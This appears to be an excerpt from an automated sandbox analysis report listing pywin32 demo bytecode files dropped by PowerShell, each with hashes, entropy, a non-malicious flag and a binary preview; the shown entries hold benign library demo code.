                                                                                                                                                                                                            SHA-256:8F71E55F58DEF54B3832D2DA3C1631635C864622C1527E88B3E7F2FB6E40660E
                                                                                                                                                                                                            SHA-512:A7567A17629DB9CFEAE215A9F061F2B3742612DC688D408FE5A63DD25FDFFB0DD6231B1DCB14941C33E48AF2DFE3C83ADD226A75842E1E7B9A8456FA14074C6B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s8...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.e.j.e.j.d...e.j.e.j.B.d.d.d.e.e.d.d...\.Z.Z.Z.e.d.e.e.......e.d.e.e.......e.d.e.....e.e.j.......D.].\.Z.Z.e...d...rTe.e.@.rTe.d.e.......qAe.j.e.j.d...e.j.e.j.B.d.d.d.e.e.d.d...\.Z.Z.Z.e.d.e.e.......e.d.e.e.......e.d.e.....e.e.j.......D.].\.Z.Z.e...d...r.e.e.@.r.e.d.e.......q.d.S.)......Nz1Python Scripts.*.py;*.pyw;*.pys.Text files.*.txt.z.Other file types.*.*...tempZ.somefilename..py..GetSaveFileNameW.....).Z.InitialDir..Flags..FileZ.DefExtZ.Title..FilterZ.CustomFilterZ.FilterIndexz.save file names:z.filter used:z.Flags:Z.OFN_.....GetOpenFileNameWz.open file names:)...osZ.win32conZ.win32gui..filterZ.customfilterr......environZ.OFN_ALLOWMULTISELECTZ.OFN_EXPLORER..fname..flags..print..repr..list..__dict__..items..k..v..startswithr......r....r.....rC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/GetSaveFileName.py..<module>....sP....................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3119
                                                                                                                                                                                                            Entropy (8bit):5.654755266664846
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:C1LKMszTwVanzlwFaByH8eFIKlSi7PapnxfeQEs:C1LlszYanxwFaBW8eWKUi7PaDWQ5
                                                                                                                                                                                                            MD5:51F1F600813012D151D006AFE3F5357A
                                                                                                                                                                                                            SHA1:8A5EC2A6FBAC58FE62304CBF88F2F3565C300FCC
                                                                                                                                                                                                            SHA-256:AED40138C3E6F9427B444B4CF69315D8A4D3D1B959E3BE140838B9707DABCF15
                                                                                                                                                                                                            SHA-512:4D58E31ECA367C9CAA7CD60965E497982A8B210A79B3072E2484C96D56CDC297302B2BC13A3B0F969684F14F367FB5429C8CD5AE2D5366B2841471250A7622CD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g3........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e.d.k.r,e...e.......d.S.d.S.).a9...A demo of using win32net.NetValidatePasswordPolicy...Example usage:..% NetValidatePasswordPolicy.py --password=foo change.which might return:..> Result of 'change' validation is 0: The operation completed successfully...or depending on the policy:..> Result of 'change' validation is 2245: The password does not meet the.> password policy requirements. Check the minimum password length,.> password complexity and password history requirements...Adding --user doesn't seem to change the output (even the PasswordLastSet seen.when '-f' is used doesn't depend on the username), but theoretically it will.also check the password history for the specified user...% NetValidatePasswordPolicy.py auth..which always (with and without '-m') seems to return:..> Result of 'auth' validation is 2701: Password must change at next logon......N)...pprintc.............
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1668
                                                                                                                                                                                                            Entropy (8bit):5.565235678636648
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CJUOp2OwF0qDiPybVABe03a2guV+FoQwpnNTeQkfQNXWM1yJ/gEUIfuTbENw4Y8:C+3XF0qTCeB2guN7pkfYpyxzz2TbE3n
                                                                                                                                                                                                            MD5:758EFC8D40FA99703D3DD9612CACB547
                                                                                                                                                                                                            SHA1:AC73295707CA4EECAE0CB6418FCE7EF95E993C2D
                                                                                                                                                                                                            SHA-256:319147664630B05F8A6A16E54C434FB4136258DEF6958CEC0E1104150FEDFCFA
                                                                                                                                                                                                            SHA-512:D41F52F7609614F88DEB1FD6AF9C9F6DBB9C22D29CB2B20B66ACE100E2A827DBA86102D75763FF58ACC5391FF82FACA5FE2738124E53616C33C519398F1226D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.e.....Z.e...e.d...d...Z.e...e.....e...e.....e.d.e.....e...e.d...d...Z.e.d.e.....e.e.d...Z.e...d.d.......e.......e.e.d...d...Z.e...d.d.......e.......e.e.d...d...Z.e...d.d.......e.......e...e.....e...e.d...d...Z.e.d.e.....e.e.d...Z.e...e.d...Z.z.e...e.e.e.e.f.e.....W.e...e.....e.......n.e...e.....e.......w.e...e.d...d...Z.e.d.e.....e.e.d...Z.e...e.e.j...Z.z.e...e.e.e.e.f.e.....W.e...e.....e.......d.S.e...e.....e.......w.)......Nc....................C...s....|.\.}.}.}.|...|.....t.j.S...N)...write..winerror..ERROR_SUCCESS).Z.input_buffer..data..buflenZ.fnamein..fnameout..f..r.....wC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/OpenEncryptedFileRaw.py..ReadCallback....s..........r....c....................C...s2...|.\.}.}.}.|...|...}.t.|...}.|.|.d.|...<.t.j.|.f.S.r....)...read..lenr....r....).Z.output_bufferr....r....Z.fnamebackupr....r......file_data
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1641
                                                                                                                                                                                                            Entropy (8bit):5.263863821042498
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:C1rVIJzR5HxtlJIFMf7WwJ2qKLjvhQFdkG:C1rSBLxtoFvwcJgkG
                                                                                                                                                                                                            MD5:5796F371087469C75B82AAB3FB54D4BE
                                                                                                                                                                                                            SHA1:E6B8A0FD2B09A2F9B23B6F161BCDF52FF5CBD23E
                                                                                                                                                                                                            SHA-256:2DBD14CAF92C1B6093EF8DAAE522208734A8E340FBC736F26863D6827A9FAC3F
                                                                                                                                                                                                            SHA-512:F765999671B85E8776C073CC2FFAA3DD60F0F94D11356F0C27FB6F8136321C7F0E7FAECC9A8EA14E658B93073139003C83F139AFDEE4D0E6AE6FFF6BEC098B93
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s|...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.e.j.d.d...Z.e.j.e.j.e.e.j.e.d...\.Z.Z.e...e...D.].Z.e...e.e.d.......q*e.j.e.j.e.e.e.j.d...Z.e.j.e.e.e.e.j.e.d...\.Z.Z.d.d...e...e...D...Z.e.e.v.s]J...d.d...e...e...D...Z.e.e.v.smJ...e...e.....d.d...e...e...D...Z.e.e.v.s.J...e.j.d.d...Z.e.j.e.e.e.d.....d.d...e...e...D...Z.e.e.v.s.J...e...e.....d.d...e...e...D...Z.e.e.v.s.J...e...e.j.e.....d.S.)......Nz*Pywin32 test transacted registry functionsz.test transacted subkeyz.Transacted Classz.test RegCreateKeyTransacted)...Description)...samDesired..Class)...KeyZ.SubKey..Transactionr....).r....r....r....c....................C........g.|.].}.|.d.....q.S...r...........0..sr....r.....yC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/RegCreateKeyTransacted.py..<listcomp>$..........r....c....................C...r....r....r....r....r....r....r....r....'...r....c....................C...r....r....r....r....r....r....r....r.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1565
                                                                                                                                                                                                            Entropy (8bit):5.935389639708424
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CRcl3UboeT550BCgUyUYCL7m5DloDSYBkamvIE2RZKpdi:CRcU840BxU1YIgHY9mQnd
                                                                                                                                                                                                            MD5:FF4A24D9CFF75D466A0C16A5351EA4E1
                                                                                                                                                                                                            SHA1:51DF78CAAEE4F1E99682FDD1D4DE23C263E65BB4
                                                                                                                                                                                                            SHA-256:BC2E646DA6A6D689F67F1A328C801AAFFE8F7CA5AEBB3BCD82B07006ED7A19D4
                                                                                                                                                                                                            SHA-512:968268D9A77742E84C7F956D1D8906B494932A61AB1D883F4974D38A9A3321660D88220E904CC501844CB8976DC96CEE5C54BF28F1CAE2294235A411686BF66C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gV........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.....Z.e...e.d...d...Z.e.e.....e...e.....e...d.e.j...e.j.f.e...d.e.j...e.j.f.f.Z.e.....Z.e...e.e.j.e.j.B...Z.e...e.d.e...Z.zle.....Z.e...e.e.j...d...Z.e.j...e.d.....e.j e.j!d.e.e.j"d.d.d...\.Z#Z$e..%e#d.e.j&d.....e.j e#d.e.e.j"d.d.d...\.Z'Z$e..%e'd.e.j&d.....e.j(e#e.e.j)e.d.....e.j e.j!d.e.e.j"d.d.d...\.Z*Z$e..+e*e.....W.e...e.d.e.....d.S.e...e.d.e.....w.)......NZ.rsk..z.Python test keyz.some class)...SecurityAttributesZ.samDesired..Class..Optionsz!Default value for python test keyz.python test subkeyz.some other classz.Default value for subkey)...Flagsr....z.Python test key(restored)z.restored class),..osZ.ntsecurityconZ.win32apiZ.win32conZ.win32securityZ.winntZ.GetTempPath..temp_dirZ.GetTempFileName..fname..print..removeZ.LookupPrivilegeValueZ.SE_BACKUP_NAMEZ.SE_PRIVILEGE_ENABLEDZ.SE_RESTORE_NAMEZ.required_privs..GetCurrentProcess..phZ.OpenProcessTokenZ.TOKEN_READZ.TOKEN_ADJUST_PRIVILEGES..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4309
                                                                                                                                                                                                            Entropy (8bit):6.078698376154799
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CQU/JH5/77QUrfMaaIkeSigb6boBJyVydmbgl+zt1uF3bBf:ChrfJa+8mE21El
                                                                                                                                                                                                            MD5:6D8DA9F7D71255EFCE1FAA72BAE3C3B9
                                                                                                                                                                                                            SHA1:C0E9B31D65E968EBB63FCBCD77C531B6FDE80ABC
                                                                                                                                                                                                            SHA-256:58440D5684ABAE46A4F85C46EE8FFD91CCF34D478C0A87FF27723300F36B0705
                                                                                                                                                                                                            SHA-512:F0166654C1DF908DDC786DBE9DB27EACBF375CAB1880D7B4E6D4E776DF45F70404BCAA29F1770CEE6E03CD45F55C5A191F3F4F0BCCAFB1458E44D1BEF29CBCC7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...st...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.D.]SZ.e.e.....e.e.e...Z.e.e.e...d.d.....Z.e...e...Z.e.d.e.....e...e.e.d.......e...e...Z.e.d.e.....e.e.d...k.r^e.e.k.sVJ...e.d.e...d.......e...e.e.....e...e...e.k.smJ...q.d.D.]BZ.e.e.....e.e.e...Z.e.e.e...d.d.....Z.e...e...Z.e.e.....e...e.e.......e...e...Z.e.e.....e.e.k.s.J...e...e.e.....e...e...e.k.s.J...qpd.D.]EZ.e.e.e...Z.e.e.e...d.d.....Z.e...e...Z.e...e.e.......e...e...Z.e.e.k.r.e.d.e.d.e.d.e.....n.e.d.e.d.e.....e...e.e.....e...e...e.k.s.J...q.e.d.....e...e.j...Z.e.j.Z.e.j.Z.e.d.e.d.e.....e...j.d.7..._.e.j...e._.e...e.j.e.....e...e.j...Z.e.d.e.j.d.e.j.....e.j.e.d...k...s>J...e.j.e.k...sFJ...e.e._.e.e._.e...e.j.e.....e...e.j...Z.e.j.e.k...saJ...e.j.e.k...siJ...e.d.....e...e.j...Z.e...e.j...Z.e...e.j...Z.e.d.e.e.e.....e...e.j.e.d.......e...e.j.e.d.......e...e.j.e.d.......e...e.j...Z e...e.j...Z!e...e.j...Z"e.d.e e!e"....e e.d...k...s.J...e!e.d...k...s.J...e"e.d...k...s.J...e...e.j.e.....e.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5433
                                                                                                                                                                                                            Entropy (8bit):5.802171057949526
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CFa08tRlpQ8qyo5TmgsF2y0e4BQ1BeegDGzjgl7Rb1q2Tt6CIv7AHNvm2:CCp7o5Tmg0eReBeeSG4l7p82TqTAHhm2
                                                                                                                                                                                                            MD5:2256A52C5905E9E29AB74A4BAD902026
                                                                                                                                                                                                            SHA1:E7E36584404978695C2F2F02803DB2E91EC534D3
                                                                                                                                                                                                            SHA-256:AE627153CF1EF4274FB7E5FC278D7E41DAEBFD13125A1821C8ABD3F97737D5D2
                                                                                                                                                                                                            SHA-512:EFC90120CC0B23BA70F695E92FAFE292BC950A4DFB1E3E90BD573520B0FD7DCF520CB7C65B9665B888D1914A2A85D89614E74B4B849DD1DED6CF1F110ED614FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g. .......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.i.Z.e...d.d.e.j...Z.e...e.e.j...Z.e...d...Z.z.e...e.d...Z.W.n...e.j.yk......e...e.d...Z.Y.n.w.d.a.e.e.e...d.....e.s~e...d.....e.rwe.r.e.......e...d.....e.s.d.S.d.S.)......Nc....................C...s~...|.t.j.t.j.f.v.r.t...|.....d.S.|.t.j.k.r;|.t.j.k.r/t...|.d...}.t.d.|.....t...|.....t.|.....d.S.|.t.j.k.r=t...|.....d.S.d.S.d.S.).z1Handles messages from the desktop name dialog box.H...z.new desktop name: N)...win32con..WM_CLOSE..WM_DESTROY..win32guiZ.DestroyWindow..WM_COMMAND..IDOKZ.GetDlgItemText..print..create_desktop..IDCANCEL)...hwnd..msgZ.wparamZ.lparam..desktop_name..r.....qC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/desktopmanager.py..desktop_name_dlgproc....s............................r....c....................C...s....t.j.t.t.j.t.t.j.t.i.}.t.j.t.j.B.t.j.B.t.j.B.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3216
                                                                                                                                                                                                            Entropy (8bit):5.762278619526942
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CynTHcmyS/S4BIYaOxfWeS1+J2YUaKnnqB0GqgLZN4lgXnRSajJFqqM/7I/5b1T:CiHcbSa9OVWt1+LcFrglR3RS7E/5b9
                                                                                                                                                                                                            MD5:A1D05D22FE969CF124373CA95CAEE0DB
                                                                                                                                                                                                            SHA1:2B2C11FDD014C9C162C1731364FDFE0C501FA01E
                                                                                                                                                                                                            SHA-256:4FF04E96262CFBFB54BC5BB7BAF5ECEF6D5F94B247CD447883494007CFAD7B6F
                                                                                                                                                                                                            SHA-512:014DDADA58B5B50433B0D01B8F9255CADB07DCA18650CE820114EE7BA0634B5054B0E9A921BCC818A32295DF73F41E834C20C436E91575CE6A27C28606BEF54F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sX...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.k.r*e.....d.S.d.S.)......N..Applicationc....................C...sT...t...|.|...}.t...|...}.d.}...t...|.t.j.t.j.B.d...}.|.s.np|.D.]f}.t...|.|...}.|.j.d.u.rTz.t...|.|.j...\.}.}.}.|...d.|.....}.W.n...t.j.yM......t.|.j...}.Y.n.w.d.|.....}.n.d.}.|.r.t.d...|.j.|.j...........|.rjt.|.....z.t.|.....W.q...t.y.......t.d.....t.t.|.......Y.q.w.q.|.t.|...7.}.q.|.|.k.r.t.d.|.d.....n.t.d.|.|.f.......t.d.....t...|.....d.S.).Nr.........../z.Event associated with user z&Event record from {!r} generated at {}z3(unicode error printing message: repr() follows...)z.Successfully read all..recordsz4Couldn't get all records - reported %d, but found %dzJ(Note that some other app may have written records while we were running!))...win32evtlogZ.OpenEventLogZ.GetNumberOfEventLogRecordsZ.ReadEventLogZ.EVENTLOG_BACKWARDS_READZ.EVENTLOG_SEQUENTIAL_READ..win32evtlogutilZ.SafeFormatMessageZ.Sid..win32secur
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):792
                                                                                                                                                                                                            Entropy (8bit):5.634522817492122
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1CnQTAXzqulE2hxQFOAhmB1G9vdYqqNdqft9K6hvoMoZ//2IaVU7:C4Ze2H14mB1SVYqqNdq/K65oMoZX2/O
                                                                                                                                                                                                            MD5:D0E03662C39C0913057C882F77C70C83
                                                                                                                                                                                                            SHA1:B57BD4E37A6C200C56DD48E580DB60EB685D3E10
                                                                                                                                                                                                            SHA-256:D7142678E3EE02AB00BE9B9900AD0DAB2B742F44736D085CF6CFC85FFDDDA2E5
                                                                                                                                                                                                            SHA-512:B90BC3C2491F4069E9E94884822346427301AF6B8612E2E9CA4BABADBE62E64D41232DE75B1550506067C327B485A1AC85D9E04B90799EA2048CC4E9E885F39C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.Z.e.j.d...Z.e...e.d...Z.e.....D.].\.Z.Z.e.e.e.....q.e...e.d...Z.e.D.]'\.Z.Z.e.d.e.d.e.....e.D.].Z.d.e.d...e.d...d.e.....Z.e.e.e.e...e.e.........q8q+d.S.)......N).Z.CommentsZ.InternalNameZ.ProductNameZ.CompanyNameZ.LegalCopyright..ProductVersionZ.FileDescriptionZ.LegalTrademarksZ.PrivateBuildZ.FileVersionZ.OriginalFilenameZ.SpecialBuild..comspec..\z.\VarFileInfo\Translationz.lang: z.codepage:z.\StringFileInfo\Z.04X)...osZ.win32apiZ.ver_strings..environ..fnameZ.GetFileVersionInfo..d..items..n..v..print..pairs..langZ.codepageZ.ver_stringZ.str_info..repr..r....r.....mC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/getfilever.py..<module>....s..................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1865
                                                                                                                                                                                                            Entropy (8bit):5.660284282892825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Cd7yMd/wDud3j/lO93f7o29SkTF3W2fEcAJ:CdWMZwCp/63Vskx3NE
                                                                                                                                                                                                            MD5:F53B0252195349AC464AD02B0047487F
                                                                                                                                                                                                            SHA1:3C96B7DA70575FFA3B3EF5FB7F92FBC74ED7B22D
                                                                                                                                                                                                            SHA-256:175F1039AB4B2C89AA65297827C6F296C37ED7F2274A21EAAEBF11EC3AAE586C
                                                                                                                                                                                                            SHA-512:3887D0B4FB84CC34BEA634A77EC22E496DD1ABE2845FBF9E146780E792E73697D1DF9D4D36FC219BA4BD0FF1ABA4CEC8051F5C9835F557CC51DDF8F577B6FC21
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g6........................@...sP...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.....Z.e.d...Z.e.d...Z.e.....Z.e.j...e...d...Z.d.e...Z.e.e.e.e.....e.j.e.e.e.d...Z.e...d.....e...d.....e...d.d.....e.....d.k.sVJ...e.j.e.d.e.d...d...Z.e.....e.....k.sjJ...e...d.d.....e...e.d.......e...e...e.d...k.s.J...d.Z.d.Z.d.Z.e...e.d.....e.....e.k.s.J...e...d.e.......e...e.e.e.....e...e.d.....e...e...d.e...k.s.J...e.......e...e.d.......e.....e.d...k.s.J...e...e.....e...d.e.......e.......e.......e.. e.....e.....Z!d.Z.d.Z"d.Z.d.Z#d.Z$e.e...r.e.e.e.e.....7.Z.e$e.....r.e$e.e$e.....7.Z$e#e#e...8.Z#d.Z.d.Z.zsz.e...e!e.e.d.e#d.....Z.W.n"..e.j%..yD..Z&..z.e&j.e.j'k...r4..e.d.e.d.....W.Y.d.Z&[&n%d.Z&[&w.w.e...e#....e...e"....e.j.d.e.d.e#e$d...Z.e...e(e"....e"k...seJ...W.e.d.u...roe.......e.d.u...rxe.......e.j..)e!....r.e.. e!....d.S.d.S.e.d.u...r.e.......e.d.u...r.e.......e.j..)e!....r.e.. e!....w.w.)......N...............)...File..Name..MaximumSize.d........?..........).r....r....r.........si..........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2138
                                                                                                                                                                                                            Entropy (8bit):5.840073893272634
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Cz4g/g3vdziL5niqos7N/L7n3bJaz9WwpGIlO+gk/2ArqoIyso:CW3vVIQUNDr3bJaUwT4+gqrqoJH
                                                                                                                                                                                                            MD5:18BC0029AAF5F45B83EB5896CC47709B
                                                                                                                                                                                                            SHA1:47B637B1FF5C4C597FEF5D5EC89FCF0D6D133266
                                                                                                                                                                                                            SHA-256:353694111F781AB2873D936C3E57CB82F723282F403F25154AB25340648A0F1F
                                                                                                                                                                                                            SHA-512:888870944ADB4D438D1305B442EA91611CE4D0B6E569AE047C6EFED623A4F68FE0BE4CB6FCC1F9B3ACA2C0126806223F1D726635A5200ED24EC9A6DFC9CDA9E9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.....Z.e.e.....e...e...Z.e.d.e.....e...e.d...d...Z.e...d.e.e.d.d.d...Z.e.e.....j...Z.e...e...Z.e.j.e.j.B.e.j.B.e._.e.j.e._.d.e._.e...d.e.e.e.e.e.j.e.j.B.....e...e.e.e...Z.e...e.e.j...Z.e...e.e.j...Z e..!..Z"e..#e"..\.Z$Z%Z&Z'e'e%..Z(e&e$..Z)e..*e"..Z+e..,e+..Z-e...e+e)e(..Z/e..0e-e/....e..1e-d.d.e)e(e+d.d.e)e(e.j2....e..,e...Z3e...e.e.e ..Z4e..0e3e4....e..1e3d.d.e.e e-d.d.e)e(e.j2....e..5e.d.....e..6e.....e..1e.d.d.e7e.d.....e7e d.....e3d.d.e.e e.j2....e..8..Z9e7e d.....e9_:e9j:e9_;d.e9_<d.e9_=d.e9_>e..?e9..Z@e..0e.e@....e..Ae.e.jB....e..Ce.e..Dd.d.d.......e..Ee.d.d.d.d.e7e.d.....e7e d.....f.e.jFe.jGB.e.jHB.....e..Ie.....e..Je.....e..Ke.....e..Le/....e..Le4....e..Le@....e..Me+....e..Me-....e..Me.....e..Me3....d.S.)......Nz.Printer handle: .....Z.pPrintProcessor).z.desktop.bmpNNr....g.......?...................z.Printed by Python!.....)NZ.pywintypesZ.win32apiZ.win32conZ.win32guiZ.win32printZ.GetDefau
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3820
                                                                                                                                                                                                            Entropy (8bit):5.521068529123651
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Cfv0NOcVBo4VGdiAX2BwyC2epjhLZm3s0R:CfeLBo4AdiAX2m3rQxR
                                                                                                                                                                                                            MD5:E93788BF769538F08271DFD69FFDEEA8
                                                                                                                                                                                                            SHA1:3E655CAC84752701CE8187EB7F3B92D890526E67
                                                                                                                                                                                                            SHA-256:6B1D1E4B22FD47EAE542598F000EDA06FEE1B2659652EDDC25074A769A9F0988
                                                                                                                                                                                                            SHA-512:582A6D51126ABC34E5FD13FF6BF4A5065E4140381BECFED7690536C9296DE8B3785651C6E600401F2DDF42835180BBBDC76C48B26B7CC03D02CE1BBBB4872D3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.i.Z.e.e.j.......D.].\.Z.Z.e.d.d.....d.k.r)e.d.d.....e.e.<.q.d.d.l.Z.e...d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.d...Z.e.d.k.r]e.....d.S.d.S.)......N.....Z.RASCS_c....................C...sz...t...|.d...}.t.d.|.|.|.f.......|.t.j.f.v.}.|.r.t...t.....|.d.k.s't.|...t.j.k.r;t.d.t...|.........t.|.....t...t.....d.S.d.S.).Nz.Unknown state?z&Status is %s (%04lx), error code is %dr....z.Detected call failure: %s)...stateMap..get..print..win32rasZ.RASCS_Connected..win32event..SetEvent..callbackEvent..int..RASCS_Disconnected..GetErrorString..HangUp)...hras..msg..state..errorZ.exterrorZ.stateName..finished..r.....jC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/rastest.py..Callback....s........................r....c....................C...sF...t.d.....t.....D.].\.}.t.d.|.....q.t.d.....t.....D.].}.t.d.|.....q.d.S.).Nz.All phone-book entries:.. z.Current Conne
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1508
                                                                                                                                                                                                            Entropy (8bit):5.211520648016867
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CqySSvNFe4mw0kdZX2qMeMj6Gpwjv1x+zhpwtW55FlQxFtRiDgFwnAsFUp:C/e4mAdZX2qRjdxW/wGnlmYgwnA7p
                                                                                                                                                                                                            MD5:4763FDC5A8D12CBA80C71BB231D831FE
                                                                                                                                                                                                            SHA1:7E72E20F9438A090764175A8B6E92DB6CB572FD2
                                                                                                                                                                                                            SHA-256:C1472D87D6D2B870EB5FE025F92CCDD40C7C76060FF43A115F27DB84C86744DE
                                                                                                                                                                                                            SHA-512:963E28C1B94E5E24B01A6CD1E6A0016E1634E24E727C996555B1AA95419F226263E73D56DDBBAA93B680ECEB257BB8CBEB8F0BF0285DDB1B6BFAEA500F32813E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sN...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.G.d.d...d...Z.d.d.d...Z.e.d.k.r%e.....d.S.d.S.)......Nc....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.S.)...glork..........c....................C...s2...d.|._.|.|._.t...|.|.j...|._.t...d.d.d.d...|._.d.S.).Nr....)...x..max..timerZ.set_timer..increment..id..win32event..CreateEvent..event)...self..delayr......r.....mC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/timer_demo.py..__init__....s............z.glork.__init__c....................C...sF...t.d.|.j.......|...j.d.7..._.|.j.|.j.k.r!t...|.....t...|.j.....d.S.d.S.).Nz.x = %d.....)...printr....r....r....Z.kill_timerr......SetEventr....).r....r......timer....r....r....r........s................z.glork.incrementN..r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....r....r....c....................C...sr...t.|.|...}.t.....}...t...|.j.f.d.d.t.j...}.|.t.j.k.r
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3368
                                                                                                                                                                                                            Entropy (8bit):5.411262848585828
